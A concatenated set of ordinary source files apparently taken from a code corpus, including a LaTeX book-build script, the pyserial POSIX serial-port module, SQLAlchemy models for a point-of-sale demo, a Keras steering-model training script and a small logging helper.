remove_tmp(texname + ".aux") remove_tmp(texname + ".idx") remove_tmp(texname + ".log") remove_tmp(texname + ".lof") remove_tmp(texname + ".lot") def read_bbl_file(object_name): file_bbl = object_name + ".bbl" if not os.path.isfile(file_bbl): return "" with open(file_bbl, 'r') as f: return f.read() #if depend_files contains citation def need_bibtex(object_name, depend_files): #if a file contains latex citation command \cite{} def contain_citation(section_name): with open(section_name, "r") as f: content_section = f.read() if content_section.find("\\cite{") == -1: return False return True for section in depend_files: if contain_citation(section): return True return False def gen_pdf(object_name): object_pdf = object_name + ".pdf" if object_name == bookname: depend_files = book_sections targets = [folder_target + object_pdf, folder_target + "AAAAAAAAAAA.pdf"] chapter_start_counter = 0 else: depend_files = chap_sections[object_name] targets = [folder_target + object_pdf] chapter_start_counter = book_chapters.index(object_name) # if is_updated(object_pdf, depend_files): # print(object_pdf + " is updated") # return False obj_need_bibtex = need_bibtex(object_name, depend_files) model = '' with open(file_model) as model_file: model = model_file.read() model = model.replace("OBJECTNAME", object_name) if object_name == 'Report': model = model.replace("CHAPTERSTART", "0") model = model.replace("\\tableofcontents", "%\\tableofcontents") model = model.replace("ctexrep", "ctexart") model = model.replace("\\setcounter{chapter}", "%\\setcounter{chapter}") else: model = model.replace("CHAPTERSTART", str(chapter_start_counter)) insert_word = "TOADD" insert_pos = model.find(insert_word) latex_text = model[:insert_pos] + insert_word for section in depend_files: latex_text = latex_text + "\n\\input{"+ section + "}" #prepend text encoding mode line section_text = "" with open(section, 'r') as f: line = f.readline() if line[:6] != '%!Mode': section_text = '%!Mode:: "TeX:UTF-8"\n' + line + f.read() if section_text != "": with open(section, 'w') as f: f.write(section_text) if obj_need_bibtex: latex_text = latex_text + "\n\n" latex_text = latex_text + "\\bibliographystyle{unsrt}\n" latex_text = latex_text + 
"\\bibliography{thebib}\n" latex_text = latex_text + model[insert_pos+len(insert_word):] object_tex = object_name + ".tex" with open(object_tex, "w") as f: f.write(latex_text) # os.system("xelatex " + object_name) # if len(sys.argv) < 3 or sys.argv[2] != "fast": # if obj_need_bibtex: # old_bbl = read_bbl_file(object_name) # os.system("bibtex " + object_name) # if old_bbl != read_bbl_file(object_name): # os.system("xelatex " + object_name) # os.system("xelatex " + object_name) # # if os.path.isfile(object_pdf): # for target in targets: # shutil.copy(object_pdf, target) return True #trim trailing slash def trim_chap_name(name): if name[len(name) - 1] == '/': name = name[:len(name)-1] return name def merge_chapter_pdfs(): mergecmd = 'pdftk ' for chap in book_chapters: chappdf = folder_target + chap + '.pdf' if os.path.isfile(chappdf): mergecmd += chappdf + ' ' mergecmd += 'cat output ' + folder_target + 'AAABBBBBBBB.pdf' print mergecmd os.system(mergecmd) ################################################## #now work starts files = os.listdir('.') chap_sections = {} book_sections = [] book_chapters = [] for chap in files: sections = get_sections(chap) if len(sections): chap_sections[chap] = sections book_sections.extend(sections) book_chapters.append(chap) cmd = "one" if cmd == "one": gen_pdf(bookname) elif cmd == "all": modified = False for chap in chap_sections: modified = gen_pdf(chap) or modified if modified: merge_chapter_pdfs() elif cmd == "clean": for chap in chap_sections: remove_latex_tmps(chap) remove_latex_tmps(bookname) else: chap = trim_chap_name(cmd) if chap in book_sections: #chap is actually a section section = chap chap = 'Report' chap_sections[chap] = [section] book_chapters.append(chap) if not chap_sections.has_key(chap): print(chap + " is not a valid chapter name") sys.exit(1) modified = gen_pdf(chap) if modified and chap != 'Report': merge_chapter_pdfs()
2.328125
2
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/serial/serialposix.py
mattl1598/testing
0
1888
#!/usr/bin/env python # # Python Serial Port Extension for Win32, Linux, BSD, Jython # module for serial IO for POSIX compatible systems, like Linux # see __init__.py # # (C) 2001-2010 <NAME> <<EMAIL>> # this is distributed under a free software license, see license.txt # # parts based on code from <NAME> <<EMAIL>>: # ftp://ftp.visi.com/users/grante/python/PosixSerial.py # # references: http://www.easysw.com/~mike/serial/serial.html import sys, os, fcntl, termios, struct, select, errno, time from .serialutil import * # Do check the Python version as some constants have moved. if (sys.hexversion < 0x020100f0): import TERMIOS else: TERMIOS = termios if (sys.hexversion < 0x020200f0): import FCNTL else: FCNTL = fcntl # try to detect the OS so that a device can be selected... # this code block should supply a device() and set_special_baudrate() function # for the platform plat = sys.platform.lower() if plat[:5] == 'linux': # Linux (confirmed) def device(port): return '/dev/ttyS%d' % port ASYNC_SPD_MASK = 0x1030 ASYNC_SPD_CUST = 0x0030 def set_special_baudrate(port, baudrate): import array buf = array.array('i', [0] * 32) # get serial_struct FCNTL.ioctl(port.fd, TERMIOS.TIOCGSERIAL, buf) # set custom divisor buf[6] = buf[7] / baudrate # update flags buf[4] &= ~ASYNC_SPD_MASK buf[4] |= ASYNC_SPD_CUST # set serial_struct try: res = FCNTL.ioctl(port.fd, TERMIOS.TIOCSSERIAL, buf) except IOError: raise ValueError('Failed to set custom baud rate: %r' % baudrate) baudrate_constants = { 0: 0000000, # hang up 50: 0o000001, 75: 0o000002, 110: 0o000003, 134: 0o000004, 150: 0o000005, 200: 0o000006, 300: 0o000007, 600: 0o000010, 1200: 0o000011, 1800: 0o000012, 2400: 0o000013, 4800: 0o000014, 9600: 0o000015, 19200: 0o000016, 38400: 0o000017, 57600: 0o010001, 115200: 0o010002, 230400: 0o010003, 460800: 0o010004, 500000: 0o010005, 576000: 0o010006, 921600: 0o010007, 1000000: 0o010010, 1152000: 0o010011, 1500000: 0o010012, 2000000: 0o010013, 2500000: 0o010014, 3000000: 0o010015, 3500000: 0o010016, 4000000: 0o010017 } elif plat == 'cygwin': # cygwin/win32 (confirmed) def device(port): return '/dev/com%d' % (port + 1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat == 'openbsd3': # BSD (confirmed) def device(port): return '/dev/ttyp%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'bsd' or \ plat[:7] == 'freebsd' or \ plat[:7] == 'openbsd': # BSD (confirmed for freebsd4: cuaa%d) def device(port): return '/dev/cuad%d' % port def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:6] == 'darwin': # OS X version = os.uname()[2].split('.') # Tiger or above can support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def set_special_baudrate(port, 
baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit of luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portnum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # what's up with "aix", "beos", .... # they should work, just need to know the device names. # load some constants for later use. 
# try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. 
This may throw a SerialException if the port cannot be opened.""" self.fd = None if self._port is None: raise SerialException("Port must be configured before it can be used.") # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except Exception as msg: self.fd = None raise SerialException("could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True #~ self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd) except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. 
there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() while len(read) < size: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. 
raise SerialException('device reports readiness to read but returned no data (device disconnected?)') read.extend(buf) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if self.fd is None: raise portNotOpenError t = len(data) d = data if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while t > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError d = d[n:] t = t - n except OSError as v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if self.fd is None: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def drainOutput(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """For easier use of the serial port instance with select. 
WARNING: this function is not portable to different platforms!""" if self.fd is None: raise portNotOpenError return self.fd def flowControl(self, enable): """manually control flow - when hardware or software flow control is enabled""" if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) # assemble Serial class with the platform specific implementation and the base # for file-like behavior. for Python 2.6 and newer, that provide the new I/O # library, derive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return fewer characters than requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write(b'hello') # bytes, not str, on Python 3 sys.stdout.write('%r\n' % s.read(5)) sys.stdout.write('%s\n' % s.inWaiting()) del s
2.5
2
Older Examples - enter at your own risk/lavender_pos/app/models.py
electricimp/examples
26
1889
<reponame>electricimp/examples import datetime from database import Base from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float class User(Base): __tablename__ = 'users' id = Column(Integer, primary_key=True) first_name = Column(String(255)) last_name = Column(String(255)) email = Column(String(255), index=True, unique=True) password = Column(String(255)) def get_id(self): """ Callback for Flask-Login. Returns the unique ID of a given user object. It is unicoded as per specification. Returns: the unique ID of an object """ return unicode(self.id) def is_anonymous(self): """ Callback for Flask-Login. Default to False - we don't deal with any anonymous users. Returns: False """ return False def is_active(self): """ Callback for Flask-Login. Default to True - we don't deal with non-active users. Returns: True """ return True def is_authenticated(self): """ Callback for Flask-Login. Should return True unless the object represents a user that should not be authenticated. Returns: True because all objects should be authenticated """ return True class PendingTransaction(Base): __tablename__ = 'pending_transactions' id = Column(Integer, primary_key=True) barcode = Column(String(10)) user_id = Column(Integer, ForeignKey('users.id')) timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now) # callable default: evaluated per INSERT, not once at import # Status: 0 - default, 1 - scanned, 2 - claimed status = Column(Integer, default=0) company = Column(Integer, ForeignKey('vendors.id')) amount = Column(Float) class Transaction(Base): __tablename__ = 'transactions' id = Column(Integer, primary_key=True) user_id = Column(Integer, ForeignKey('users.id')) company = Column(Integer, ForeignKey('vendors.id')) amount = Column(Float) timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now) class Vendor(Base): __tablename__ = 'vendors' id = Column(Integer, primary_key=True) name = Column(String(255)) agent_url = Column(String(255)) secret = Column(String(255))
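SQLAlchemy column defaults take a callable so the timestamp is computed per INSERT; passing the result of now() instead would freeze one import-time value for every row. A minimal illustration of the difference (the sleep length is arbitrary):

# Why Column(..., default=datetime.datetime.now) passes the function itself:
# calling now() at class-definition time freezes a single import-time value.
import datetime
import time

frozen = datetime.datetime.now()   # evaluated once, when this line runs
deferred = datetime.datetime.now   # evaluated each time it is called

time.sleep(1)
print(frozen)      # the old, frozen value
print(deferred())  # the current time at this call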
2.9375
3
rr_ml/nodes/end_to_end/train.py
ebretl/roboracing-software
0
1890
import os import math import string import numpy as np import rospy import keras from keras.models import Sequential from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, \ GaussianNoise, BatchNormalization import cv2 import collections import random import time from example_set import ExampleSet from params import input_shape, expand_categories n_examples_to_load = 8000 # if the number of training examples is below this, load more data batch_size = 16 categories = [None] def defineCategory(steering): differences = [abs(steering - category) for category in categories] category = np.argmin(differences) oneHot = [1 if i == category else 0 for i in range(len(categories))] return oneHot def format_inputs(examples): data2 = np.zeros((len(examples),) + input_shape, dtype='float32') for i, ex in enumerate(examples): data2[i] = ex.get_image() data2 /= 255.0 return data2 def make_model(): model = Sequential() # 128 x 48 model.add(GaussianNoise(0.05, input_shape=input_shape)) model.add(Conv2D(32, (3, 3), activation='relu', padding='same')) model.add(MaxPooling2D((4, 4))) # 32 x 12 model.add(Conv2D(64, (3, 3), activation='relu', padding='same')) model.add(MaxPooling2D((2, 2))) # 16 x 6 model.add(Flatten()) model.add(Dropout(0.25)) model.add(Dense(128, activation='relu')) model.add(Dense(32, activation='relu')) model.add(Dropout(0.35)) model.add(Dense(len(categories), activation='softmax')) model.compile(loss=keras.losses.categorical_crossentropy, optimizer=keras.optimizers.Adadelta(), metrics=['accuracy']) return model def main(): global categories, n_examples_to_load, batch_size rospy.init_node("nn_training") startTime = time.time() model_path = rospy.get_param("~model_output_path") exampleSetDir = rospy.get_param("~example_set_dir") epochs = int(rospy.get_param("~epochs")) categories = rospy.get_param("~positive_nonzero_categories") categories = string.strip(categories).split(" ") categories = [float(x) for x in categories] categories = expand_categories(categories) model = make_model() model.summary() exampleSetFiles_const = tuple(f for f in os.listdir(exampleSetDir) if '.pkl.lz4' in f) n_training_examples = 0 n_test_examples = 0 cnt = collections.Counter() for f in exampleSetFiles_const: data = ExampleSet.load(os.path.join(exampleSetDir, f)) n_training_examples += len(data.train) n_test_examples += len(data.test) for ex in data.train: i = np.argmax(defineCategory(ex.angle)) cnt[i] += 1 print "total training examples:", n_training_examples print "training label counts:", cnt def batch_generator(isValidation = False): gen_epochs = 1 if isValidation else epochs for epoch in range(gen_epochs): exampleSetFiles = list(exampleSetFiles_const) random.shuffle(exampleSetFiles) while len(exampleSetFiles) > 0: D = [] while len(exampleSetFiles) > 0 and len(D) < n_examples_to_load: data = ExampleSet.load(os.path.join(exampleSetDir, exampleSetFiles.pop())) D += data.test if isValidation else data.train if not isValidation: random.shuffle(D) X = format_inputs(D) # create output bins labels = np.array([defineCategory(ex.angle) for ex in D]) if not isValidation: for i in range(len(X)): if random.random() < 0.4: # 40% of images are flipped X[i] = cv2.flip(X[i], 1) labels[i] = labels[i][::-1] for i in range(0, len(X), batch_size): xs = X[i: i + batch_size] ys = labels[i: i + batch_size] yield (xs, ys) try: n_minibatches = int(math.ceil(float(n_training_examples) / batch_size)) model.fit_generator(batch_generator(), steps_per_epoch=n_minibatches, epochs=epochs, verbose=1) print "elapsed time:", 
time.time() - startTime n_minibatches = int(math.ceil(float(n_test_examples) / batch_size)) loss, acc = model.evaluate_generator(batch_generator(True), steps=n_minibatches) print "validation loss:", loss, "| validation accuracy:", acc finally: model.save(model_path) print "\nsaved model to", model_path
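defineCategory() in the file above one-hot-encodes a steering angle against the nearest configured bin; a worked example with an assumed category list (the real list comes from the ~positive_nonzero_categories ROS parameter):

# Worked example of the nearest-bin one-hot encoding; the category list
# here is an assumption for illustration only.
import numpy as np

categories = [-0.2, 0.0, 0.2]

def define_category(steering):
    differences = [abs(steering - c) for c in categories]
    category = int(np.argmin(differences))
    return [1 if i == category else 0 for i in range(len(categories))]

print(define_category(0.17))   # -> [0, 0, 1] (closest to 0.2)
print(define_category(-0.05))  # -> [0, 1, 0] (closest to 0.0)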
2.75
3
build/lib/Kronos_heureka_code/Zeit/__init__.py
heureka-code/Kronos-heureka-code
0
1891
<filename>build/lib/Kronos_heureka_code/Zeit/__init__.py<gh_stars>0 from Kronos_heureka_code.Zeit.Uhrzeit import Uhrzeit, Stunde, Minute, Sekunde from Kronos_heureka_code.Zeit.Datum.Monat import Monate from Kronos_heureka_code.Zeit.Datum.Jahr import Jahr, Zeitrechnung from Kronos_heureka_code.Zeit.Datum.Tag import Tag
1.273438
1
retro_star/utils/logger.py
cthoyt/retro_star
65
1892
<reponame>cthoyt/retro_star<filename>retro_star/utils/logger.py<gh_stars>10-100 import logging def setup_logger(fname=None, silent=False): if fname is None: logging.basicConfig( level=logging.INFO if not silent else logging.CRITICAL, format='%(name)-12s: %(levelname)-8s %(message)s', datefmt='%m-%d %H:%M', filemode='w' ) else: logging.basicConfig( level=logging.INFO if not silent else logging.CRITICAL, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s', datefmt='%m-%d %H:%M', filename=fname, filemode='w' ) console = logging.StreamHandler() console.setLevel(logging.INFO) formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s') console.setFormatter(formatter) logging.getLogger('').addHandler(console)
2.421875
2
Packs/MISP/Integrations/MISPV3/MISPV3.py
hiep4hiep/content
0
1893
